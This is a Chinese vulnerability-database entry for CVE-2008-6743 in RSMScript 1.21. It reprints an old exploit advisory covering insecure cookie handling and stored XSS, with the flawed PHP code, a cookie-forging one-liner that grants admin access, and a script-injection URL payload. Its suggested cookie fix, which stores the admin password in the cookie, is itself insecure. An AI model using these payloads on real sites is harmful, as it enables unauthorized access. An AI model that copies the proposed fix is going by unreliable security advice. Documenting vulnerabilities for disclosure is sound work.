Shock-Therapy RSMScript Cookie多个脚本身份认证绕过和HTML注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117075 漏洞类型 授权问题
发布时间 2008-12-17 更新时间 2009-04-23
CVE编号 CVE-2008-6743 CNNVD-ID CNNVD-200904-412
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7497
https://cxsecurity.com/issue/WLB-2009040222
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-412
|漏洞详情
RSMScript1.21版本允许远程攻击者通过把校验过的cookie设置成任意值和执行一个直接请求,来绕过身份认证和获得管理特权。该请求是对(1)delete.php,(2)edit-submit.php,(3)edit.php,(4)submit.php和(5)update.php的请求,它会绕过由verify.php执行的安全验证。
|漏洞EXP
[START]

#########################################################################################
[0x01] Informations:

Script         : RSMScript 1.21
Download       : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1
Vulnerability  : Insecure Cookie Handling / XXS
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX

#########################################################################################
[0x02] Bug: [Insecure Cookie Handling]
######

Bugged file is: /[path]/verify.php

[CODE]

if($admin_pass == $code)
{
  setcookie("verified", "null", time()+1800);
  header( 'refresh: 0; url=update.php' );
}

[/CODE]

As we can see, if the password "$code" typed is the same of $admin_pass, so you log in,
cookie is set with the name "verified" and with content "null". So, a malicious user
can just set up a cookie with that name and value, and then he will be logged as the 
admin.

[!] FIX: A fix could be to put as a content or cookie name the password. Example:

[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE]


[!] EXPLOIT: javascript:document.cookie = "verified=null; path=/";

#########################################################################################
[0x03] Bug: [XSS]
######

To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;)
There are two bugged file.

1) /[path/submit.php
   In this file, we can put arbitrary data into a .txt file.

   [CODE]

    $quote = $_REQUEST['quote'];
    $writePage = fopen('quotes.txt', 'a') or die("can't open file");
	fwrite($writePage, "\t");
    fwrite($writePage, stripslashes($quote));
    fclose($writePage);

   [/CODE]

   [!] FIX: Just filter direct user input.


2) /path/update.php
   This file gets quotes.txt content, and print it directly into html code. 
   In 1) we saw that we can put arbitrary data into this .txt file. Just
   Put js code ;)

   [CODE]

    $quotes = file_get_contents("quotes.txt");
    $quotes= preg_split("/[\t]+/", $quotes);
    $i = 0;
    $noQuotes = sizeOf($quotes);
    while ($i < $noQuotes)
    {
        $quote = $quotes[$i];
        echo '<option value='.$i.'>'.$quote.'</option>';
        $i = $i + 1;
    }

    [/CODE]

    [!] FIX: A fix could be just to filter input before being printed in html code.


## How to exploit this bugs?

[!] EXPLOIT: /[path]/submit.php?quote=<script>alert("XSS")</script>

#########################################################################################
[/END]

# milw0rm.com [2008-12-17]
|参考资料

来源:XF
名称:rsmscript-verify-security-bypass(47451)
链接:http://xforce.iss.net/xforce/xfdb/47451
来源:BID
名称:32886
链接:http://www.securityfocus.com/bid/32886
来源:MILW0RM
名称:7497
链接:http://www.milw0rm.com/exploits/7497
来源:SECUNIA
名称:33150
链接:http://secunia.com/advisories/33150
来源:OSVDB
名称:50802
链接:http://osvdb.org/50802